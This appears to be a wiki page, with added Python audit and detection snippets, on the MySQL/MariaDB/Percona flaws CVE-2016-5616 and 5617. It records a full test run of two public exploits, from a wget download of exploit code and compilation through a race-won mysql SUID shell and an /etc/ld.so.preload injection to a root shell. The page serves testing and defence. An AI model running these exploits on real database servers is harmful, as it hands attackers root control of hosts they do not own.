Create page using CVE/2016-5616 as a template
** CVE-2016-5616, 5617 [#u7059892]
*** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6]
- Requires an account on the affected machine and access to the database (...
- Especially dangerous if the MySQL default users and similar leftovers are still present.
- [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvenam...
- [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvenam...
- http://legalhackers.com/advisories/MySQL-Maria-Percona-...
- http://legalhackers.com/advisories/MySQL-Maria-Percona-...
**** Default users [#c3c58224]
- Entries with no password or no user name: at installation time...
MariaDB [(none)]> use mysql;
MariaDB [mysql]> select Host,User,Password from user;
+-----------+------+------------------------------------...
| Host | User | Password ...
+-----------+------+------------------------------------...
| localhost | root | *1B1F13007F2FA68140D751B563EB49E018...
| rigel-b | root | ...
| 127.0.0.1 | root | ...
| ::1 | root | ...
| localhost | | ...
| rigel-b | | ...
+-----------+------+------------------------------------...
- Delete them with the following commands:
MariaDB [(none)]> use mysql;
MariaDB [mysql]> delete from user where user='';
MariaDB [mysql]> delete from user where password='';
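As an added example (not part of the original page): a small Python audit that parses the client's table output shown above, flags anonymous and password-less accounts, and emits a DROP USER statement for each. The sample table is constructed to mirror the listing above; the hash is a placeholder.

```python
"""Audit a `SELECT Host,User,Password FROM mysql.user` listing for risky accounts."""

# Constructed sample in the mysql client's table layout, mirroring the listing above.
# The hash is a placeholder, not a real credential.
SAMPLE_TABLE = """\
+-----------+------+--------------------------------------------+
| Host      | User | Password                                   |
+-----------+------+--------------------------------------------+
| localhost | root | *PLACEHOLDERHASH00000000000000000000000000 |
| rigel-b   | root |                                            |
| 127.0.0.1 | root |                                            |
| ::1       | root |                                            |
| localhost |      |                                            |
| rigel-b   |      |                                            |
+-----------+------+--------------------------------------------+
"""

def parse_user_table(text):
    """Return (host, user, password) tuples from the client's ASCII table output."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # +----+ border lines
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if cells[:3] == ["Host", "User", "Password"]:
            continue  # header row
        rows.append(tuple(cells[:3]))
    return rows

def find_risky_accounts(rows):
    """Flag anonymous accounts (empty User) and accounts with an empty Password."""
    findings = []
    for host, user, password in rows:
        reasons = []
        if user == "":
            reasons.append("anonymous user")
        if password == "":
            reasons.append("empty password")
        if reasons:
            findings.append((host, user, ", ".join(reasons)))
    return findings

def remediation_sql(findings):
    """One DROP USER statement per finding; quotes are doubled so values stay literals."""
    def quote(s):
        return "'" + s.replace("'", "''") + "'"
    return ["DROP USER %s@%s;" % (quote(user), quote(host)) for host, user, _ in findings]
```

DROP USER takes effect immediately; if you use the DELETE FROM user commands above instead, run FLUSH PRIVILEGES afterwards, and note that the second DELETE also removes every root entry that has an empty password.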
**** Taking over the mysql user account [#z9d7510f]
- Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tui...
$ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilit...
$ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/...
[iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localh...
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Co...
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / CVE-2016-5616
For testing purposes only. Do no harm.
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as:
uid=502(iseki) gid=100(users) 所属グループ=100(users)
[+] Connecting to the database `test` as @localhost
[+] Creating exploit temp directory /tmp/mysql_privesc_e...
[+] Creating mysql tables
DROP TABLE IF EXISTS exploit_table
DROP TABLE IF EXISTS mysql_suid_shell
CREATE TABLE exploit_table (txt varchar(50)) engine = 'M...
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine =...
[+] Copying bash into the mysql_suid_shell table.
After the exploitation the following file/table will ...
-rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/...
[+] Entering the race loop... Hang in there...
->->->->->->->->->->->->->->->->->->->->->->->->->->->->...
[+] Bingo! Race won (took 12874 tries) ! Check out the m...
-rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/...
[+] Spawning the mysql SUID shell now...
Remember that from there you can gain root with vuln ...
mysql_suid_shell.MYD-4.1$ whoami
mysql
**** Taking over the root account from the mysql account [#l...
- Exploit code : [[mysql-chowned.sh>http://www.nsl.tuis....
mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/...
MySQL / MariaDB / Percona - Root Privilege Escalation Po...
mysql-chowned.sh (ver. 1.0)
CVE-2016-6664 / CVE-2016-5617
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as
uid=502(iseki) gid=100(users) euid=103(mysql) 所属グルー...
[+] Target MySQL log file set to /var/mysql/rigel-b.err
[+] Compiling the privesc shared library (/tmp/privescli...
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/...
[+] Symlink created at:
lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysq...
[+] Waiting for MySQL to re-open the logs/MySQL service ...
[+] Waiting for MySQL to re-open the logs/MySQL service ...
./mysql-chowned.sh: line 153: pidof: コマンドが見つかり...
Do you want to kill mysqld process to instantly get roo...
Got it. Executing 'killall mysqld' now...
[+] MySQL restarted. The /etc/ld.so.preload file got cre...
-rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so...
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.p...
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID bin...
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/my...
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/my...
Got root! The database server has been ch-OWNED !
[+] Spawning the rootshell /tmp/mysqlrootsh now!
mysqlrootsh-4.1# whoami
root
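As an added example (not from the page or the exploit author): defender-side checks for the artifacts the two runs above rely on or leave behind, namely an error log turned into a symlink, a non-root-owned /etc/ld.so.preload pointing at a library under /tmp, and setuid files in /tmp. The paths /var/mysql/rigel-b.err and /etc/ld.so.preload are taken from the output above and are assumptions for your host; the fixture built by make_demo_fixture is constructed.

```python
"""Defender-side checks for the artifacts the two exploits above rely on or leave behind."""
import os
import stat
import tempfile

def check_error_log(log_path):
    """mysql-chowned.sh turns the error log into a symlink so mysqld_safe (root) chowns
    the target; a symlinked log is a finding, a missing log is not."""
    if os.path.islink(log_path):
        return ["%s is a symlink -> %s" % (log_path, os.readlink(log_path))]
    return []

def check_ld_preload(preload_path):
    """/etc/ld.so.preload normally does not exist; non-root ownership or a library
    outside the system library dirs is suspect."""
    findings = []
    if not os.path.lexists(preload_path):
        return findings
    if os.lstat(preload_path).st_uid != 0:
        findings.append("%s is not owned by root" % preload_path)
    with open(preload_path) as f:
        for lib in (line.strip() for line in f):
            if lib and not lib.startswith(("/lib", "/usr/lib")):
                findings.append("preloaded library outside system dirs: %s" % lib)
    return findings

def is_setuid_mode(mode):
    """True for a regular file carrying the setuid or setgid bit."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def find_setuid_files(directory):
    """Walk a world-writable dir such as /tmp (where the MYD-backed shell ends up)."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if is_setuid_mode(os.lstat(path).st_mode):
                findings.append("setuid/setgid file: %s" % path)
    return findings

def make_demo_fixture():
    """Constructed fixture in a fresh temp dir: a preload file listing /tmp/privesclib.so
    and an error log that is a symlink to it. Returns (log_path, preload_path)."""
    d = tempfile.mkdtemp()
    preload = os.path.join(d, "ld.so.preload")
    with open(preload, "w") as f:
        f.write("/tmp/privesclib.so\n")
    log = os.path.join(d, "rigel-b.err")
    os.symlink(preload, log)
    return log, preload
```

On a real host call check_error_log("/var/mysql/rigel-b.err"), check_ld_preload("/etc/ld.so.preload") and find_setuid_files("/tmp") from a periodic job; any non-empty result deserves a look.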